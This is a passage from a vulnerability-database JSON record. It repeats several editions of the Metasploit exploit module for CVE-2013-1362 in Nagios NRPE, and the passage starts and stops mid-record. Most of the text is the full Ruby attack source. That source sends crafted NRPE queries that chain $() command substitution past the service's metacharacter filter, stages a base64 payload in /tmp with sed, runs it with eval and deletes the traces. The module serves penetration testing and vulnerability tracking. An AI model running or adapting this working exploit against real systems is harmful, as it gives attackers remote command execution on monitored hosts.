\"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T20:29:16", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T22:29:12", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-17T22:29:12", "differentElements": ["modified", "published"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T16:35:56", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T22:29:12", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T16:35:56", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-21T22:33:47", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T22:33:47", "differentElements": ["modified", "published"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-27T16:43:13", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T16:43:13", "differentElements": ["modified", "published"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": 